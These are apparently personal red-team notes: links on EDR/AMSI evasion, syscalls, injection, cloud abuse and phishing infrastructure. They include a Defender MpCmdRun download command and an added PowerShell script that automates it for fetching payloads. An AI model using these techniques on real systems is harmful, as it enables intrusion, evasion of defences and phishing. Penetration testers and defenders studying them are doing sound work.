Personal notes and collection of useful links.
The collection is at an early stage; more details (URLs and descriptions) will be added.
- https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/ (bypass by xpn)
- https://github.com/zacbrown/PowerKrabsEtw
- https://github.com/zacbrown/hiddentreasure-etw-demo
- https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
- https://github.com/jthuraisamy/SysWhispers
- https://jhalon.github.io/utilizing-syscalls-in-csharp-1/
- https://jhalon.github.io/utilizing-syscalls-in-csharp-2/
- https://www.solomonsklash.io/syscalls-for-shellcode-injection.html
- https://github.com/frkngksl/Celeborn
- https://github.com/m0rv4i/Syscalls-Extractor
- https://github.com/nick-frischkorn/SysWhispers-FunctionRandomizer
- Defeat Bitdefender total security using windows API unhooking to perform process injection
- Part 1: Fs Minifilter Hooking
- Windows API Hooking
- Blue team - EDR evolution
- Nice webinar - understanding-modern-edr-tools
- Let's Create An EDR… And Bypass It! Part 1
- Let's Create An EDR… And Bypass It! Part 2
- A Guide to Reversing and Evading EDRs: Part 1 Introduction
- A Guide to Reversing and Evading EDRs: Part 2 Sensor reconnaissance
- A Guide to Reversing and Evading EDRs: Part 3 Diverting EDR telemetry to private infrastructure
- Alaris
- ScareCrow
- Self deleting exe
- Defeating Antivirus Real-time Protection From The Inside
- Duping AV with handles
- Adventures in Dynamic Evasion
- Click your shortcut and… you got pwned.
- Evade EDR with Shellcode Injection and gain persistence using Registry Run Keys
- Understanding and bypassing AMSI
- Masking Malicious Memory Artifacts – Part III: Bypassing Defensive Scanners
- smaller-c-payloads-on-windows
- in-memory-shellcode-decoding-to-evade-avs
- MDSec Bypassing Image Load Kernel Callbacks
- EDR bypass via signed driver EDRSandblast
- Bypass user-mode hooks
- Cool gitbook full of great tips, not only for red teaming but for pentesting in general
- XPN - Azure AD Connect for Red Teamers
- Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
- List of Azure CDN IP Addresses
- AWS IAM explained for Red and Blue teams
- Exploiting AWS IAM permissions for total cloud compromise: a real world example (part 1/2)
- Exploiting fine-grained AWS IAM permissions for total cloud compromise: a real world example (part 2/2)
- https://itm4n.github.io/windows-dll-hijacking-clarified/
- https://github.com/monoxgas/Koppeling (DLL hijacking)
- https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/ (DLL proxy loading)
- Full DLL Unhooking with C++
- https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/
- https://sevrosecurity.com/2020/04/13/process-injection-part-2-queueuserapc/
- Post exploitation creds
- Adversary phishing characteristics
- Check the phishing server / landing page response
- Security check of your URL
- Check your phishing e-mail quality
- Recipe for a successful phishing campaign (part 1/2)
- setting up SPF, DKIM, PTR and MX records, and the general approach
- Recipe for a successful phishing campaign (part 2/2)
- setting up DNS and GoPhish, general tips for a better campaign
- Building resilient phishing campaign infrastructure
- email spoofing
- Docker, Terraform and Ansible automation
- Internal phishing
- Password protected Excel phishing
- Gophish notification
- Gophish notification via webhooks
- HTML landing page obfuscation
- HTML smuggling obfuscated
- sendgrid
- useful service, but honestly you need the paid Pro plan to be lucky enough not to end up on a spam list
- mailgun
- haven't had any problems
- Amazon AWS SES
- Download via Defender
- Host your payloads and serve them based on your conditions
- Host redteam payloads
- (You can use Windows Defender itself to download a file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe -DownloadFile -url <url> -path <destination>. The version folder name changes with every platform update, so check which one is present on the host before hard-coding it.)
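The following PowerShell snippet is an added example, not part of the original notes: it finds the current Defender platform directory instead of hard-coding a version string, then invokes MpCmdRun.exe -DownloadFile with the given URL and destination. The parameter names, the placeholder URL and the output path are assumptions for illustration.

```powershell
# Added example (not from the original notes): locate the newest Defender
# platform folder at run time, then download a file through MpCmdRun.exe.
# $Url and $OutFile are placeholders supplied by the caller (assumption).
param(
    [Parameter(Mandatory)][string]$Url,
    [Parameter(Mandatory)][string]$OutFile
)

$platformRoot = Join-Path $env:ProgramData 'Microsoft\Windows Defender\Platform'

# Platform subfolders are named after the engine version, e.g. 4.18.2008.9-0.
# Strip the trailing "-N" suffix and sort as a [version] so "4.18.2010.7-0"
# correctly outranks "4.18.2008.9-0" (a plain string sort would not).
$latest = Get-ChildItem -Path $platformRoot -Directory |
    Sort-Object { [version]($_.Name -replace '-\d+$', '') } -Descending |
    Select-Object -First 1

if (-not $latest) {
    throw "No Defender platform directory found under $platformRoot"
}

$mpCmdRun = Join-Path $latest.FullName 'MpCmdRun.exe'
if (-not (Test-Path $mpCmdRun)) {
    throw "MpCmdRun.exe not found in $($latest.FullName)"
}

# Let Defender perform the download; -DownloadFile writes the response body to -path.
& $mpCmdRun -DownloadFile -url $Url -path $OutFile

if (Test-Path $OutFile) {
    Get-Item $OutFile | Select-Object FullName, Length, LastWriteTime
} else {
    Write-Warning "Download did not produce $OutFile (MpCmdRun exit code $LASTEXITCODE)"
}
```

Usage: .\defender-download.ps1 -Url https://example.invalid/file.bin -OutFile C:\Users\Public\file.bin (hostname and paths are placeholders). The file lands on disk through a Microsoft-signed binary, but it is still a new file write that Defender and any EDR with file-creation telemetry can see, so treat this as a download primitive, not as an evasion on its own.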
- If you are always looking through your ssh config files for a specific host entry, this simple bash function might be just what you need. It prints every block from a line matching the argument up to the next blank line, across all files in ~/.ssh/include/:
function getssh() {
    # Pass the files as awk arguments: "< ~/.ssh/include/*" fails with an
    # "ambiguous redirect" as soon as the directory holds more than one file.
    awk -v host="$1" '$0 ~ host, /^$/' ~/.ssh/include/*
}
- Weaponry
- A collection of offensive code used for red team engagements.
- Mr-Un1k0d3r awesome repo
- PowerShellArmoury
- RedTeamTools
- inceptor
- mgeeky awesome repo
- Stealthy ACL recon AD